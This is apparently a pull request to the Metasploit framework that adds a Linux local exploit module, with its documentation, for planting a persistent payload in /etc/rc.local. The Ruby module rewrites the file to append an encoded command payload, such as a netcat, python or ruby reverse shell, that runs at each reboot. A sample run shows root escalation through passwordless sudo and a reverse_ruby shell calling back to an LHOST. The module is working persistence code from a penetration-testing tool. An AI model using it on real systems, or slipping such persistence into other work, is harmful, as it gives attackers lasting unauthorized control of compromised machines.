### PR TITLE
[GSOC] Rc local persistence

### DIFF
--- a/documentation/modules/exploit/linux/local/rc_local_persistence.md
+++ b/documentation/modules/exploit/linux/local/rc_local_persistence.md
@@ -2,6 +2,8 @@
 
 This module patch `/etc/rc.local` in order to launch a payload upon reboots.
 
+> Sometimes `/etc/rc.local` is runned when the network is not yet on, make sure your payload won't quit if that's the case.
+
 
 ### Verification
 

--- a/documentation/modules/exploit/linux/local/rc_local_persistence.md
+++ b/documentation/modules/exploit/linux/local/rc_local_persistence.md
@@ -1,0 +1,46 @@
+## rc.local Persistence
+
+This module patch `/etc/rc.local` in order to launch a payload upon reboots.
+
+
+### Verification
+
+1. Exploit a box and get a **root** session (tip: try `post/multi/manage/sudo`)
+2. `use exploit/linux/local/rc_local_persistence`
+3. `set SESSION #`
+4. `set PAYLOAD #`
+5. `set LHOST ##`
+6. `exploit`
+
+
+### Sample run
+
+#### Escalate the session if needed
+
+```
+msf5 exploit(linux/local/rc_local_persistence) > use post/multi/manage/sudo 
+msf5 post(multi/manage/sudo) > set session 3
+session => 3
+msf5 post(multi/manage/sudo) > run
+
+[*] SUDO: Attempting to upgrade to UID 0 via sudo
+[*] No password available, trying a passwordless sudo.
+[+] SUDO: Root shell secured.
+[*] Post module execution completed
+```
+
+#### Persist
+
+```
+msf5 post(multi/manage/sudo) > use exploit/linux/local/rc_local_persistence
+msf5 exploit(multi/handler) > set payload cmd/unix/reverse_ruby
+payload => cmd/unix/reverse_ruby
+msf5 exploit(linux/local/rc_local_persistence) > set LHOST 192.168.0.41
+LHOST => 192.168.0.41`
+msf5 exploit(linux/local/rc_local_persistence) > run
+
+[*] Reading /etc/rc.local
+[*] Patching /etc/rc.local
+[*] Max line length is 65537
+[*] Writing 650 bytes in 1 chunks of 2251 bytes (octal-encoded), using printf
+```

--- a/documentation/modules/exploit/linux/local/rc_local_persistence.md
+++ b/documentation/modules/exploit/linux/local/rc_local_persistence.md
@@ -1,17 +1,17 @@
 ## rc.local Persistence
 
-This module patch `/etc/rc.local` in order to launch a payload upon reboots.
+This module patches `/etc/rc.local` in order to launch a payload upon reboot.
 
-> Sometimes `/etc/rc.local` is runned when the network is not yet on, make sure your payload won't quit if that's the case.
+> Sometimes `/etc/rc.local` is run when the network is not yet on, make sure your payload won't quit if that's the case.
 
 
 ### Verification
 
 1. Exploit a box and get a **root** session (tip: try `post/multi/manage/sudo`)
 2. `use exploit/linux/local/rc_local_persistence`
-3. `set SESSION #`
-4. `set PAYLOAD #`
-5. `set LHOST ##`
+3. `set SESSION <session>`
+4. `set PAYLOAD <payload>`
+5. `set LHOST <lhost>`
 6. `exploit`
 
 

--- a/modules/exploits/linux/local/rc_local_persistence.rb
+++ b/modules/exploits/linux/local/rc_local_persistence.rb
@@ -1,0 +1,57 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'rc.local Persistence',
+      'Description'    => %q(
+        This module will edit /etc/rc.local in order to persist a payload.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Eliott Teissonniere' ],
+      'Platform'       => [ 'unix', 'linux' ],
+      'Arch'           => ARCH_CMD,
+      'Payload'        => {
+        'BadChars'   => '#%\n',
+        'Compat'     => {
+          'PayloadType'  => 'cmd',
+          'RequiredCmd'  => 'generic python ruby netcat perl'
+        }
+      },
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
+      'DisclosureDate' => 'Oct 1980', # The rc command appeared in 4.0BSD.
+      'Targets'        => [ ['Automatic', {}] ],
+      'DefaultTarget'  => 0
+    ))
+  end
+
+  def exploit
+    print_status('Reading /etc/rc.local')
+    
+    # read /etc/rc.local, but remove `exit 0`
+    rc_local = cmd_exec('cat /etc/rc.local | grep -v "exit 0"')
+    
+    # add payload and put back `exit 0`
+    rc_local += [
+      "", # makes sure there is a newline
+      payload.encoded,
+      "exit 0"
+    ].join("\n")
+    
+    # write new file
+    print_status('Patching /etc/rc.local')
+    write_file('/etc/rc.local', rc_local)
+  end
+end
+
+

--- a/modules/exploits/linux/local/rc_local_persistence.rb
+++ b/modules/exploits/linux/local/rc_local_persistence.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Local
       },
       'SessionTypes'   => [ 'shell', 'meterpreter' ],
       'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
-      'DisclosureDate' => 'Oct 1980', # The rc command appeared in 4.0BSD.
+      'DisclosureDate' => 'Oct 01 1980', # The rc command appeared in 4.0BSD.
       'Targets'        => [ ['Automatic', {}] ],
       'DefaultTarget'  => 0
     ))
@@ -37,17 +37,17 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     print_status('Reading /etc/rc.local')
-    
+
     # read /etc/rc.local, but remove `exit 0`
     rc_local = read_file('/etc/rc.local').gsub(/^exit.*$/, '')
-    
+
     # add payload and put back `exit 0`
     rc_local += [
       "", # makes sure there is a newline
       payload.encoded,
       "exit 0"
     ].join("\n")
-    
+
     # write new file
     print_status('Patching /etc/rc.local')
     write_file('/etc/rc.local', rc_local)

--- a/modules/exploits/linux/local/rc_local_persistence.rb
+++ b/modules/exploits/linux/local/rc_local_persistence.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Local
     print_status('Reading /etc/rc.local')
     
     # read /etc/rc.local, but remove `exit 0`
-    rc_local = cmd_exec('cat /etc/rc.local | grep -v "exit 0"')
+    rc_local = read_file('/etc/rc.local').gsub(/^exit.*$/, '')
     
     # add payload and put back `exit 0`
     rc_local += [

--- a/modules/exploits/linux/local/rc_local_persistence.rb
+++ b/modules/exploits/linux/local/rc_local_persistence.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Local
       'Platform'       => [ 'unix', 'linux' ],
       'Arch'           => ARCH_CMD,
       'Payload'        => {
-        'BadChars'   => '#%\n',
+        'BadChars'   => "#%\n",
         'Compat'     => {
           'PayloadType'  => 'cmd',
           'RequiredCmd'  => 'generic python ruby netcat perl'

--- a/modules/exploits/linux/local/rc_local_persistence.rb
+++ b/modules/exploits/linux/local/rc_local_persistence.rb
@@ -42,11 +42,7 @@ class MetasploitModule < Msf::Exploit::Local
     rc_local = read_file('/etc/rc.local').gsub(/^exit.*$/, '')
 
     # add payload and put back `exit 0`
-    rc_local += [
-      "", # makes sure there is a newline
-      payload.encoded,
-      "exit 0"
-    ].join("\n")
+    rc_local << "\n#{payload.encoded}\nexit 0"
 
     # write new file
     print_status('Patching /etc/rc.local')

--- a/modules/exploits/linux/local/rc_local_persistence.rb
+++ b/modules/exploits/linux/local/rc_local_persistence.rb
@@ -36,6 +36,10 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
+    unless cmd_exec("test -w '/etc/rc.local' && echo true").include? 'true'
+      fail_with Failure::BadConfig, '/etc/rc.local is not writable'
+    end
+
     print_status('Reading /etc/rc.local')
 
     # read /etc/rc.local, but remove `exit 0`


### PR DESCRIPTION
Add a local exploit to persist a `cmd` module in the `/etc/rc.local` file.

## Verification

1. Exploit a box and get a **root** session (tip: try `post/multi/manage/sudo`)
2. `use exploit/linux/local/rc_local_persistence`
3. `set SESSION #`
4. `set PAYLOAD #`
5. `set LHOST ##`
6. `exploit`
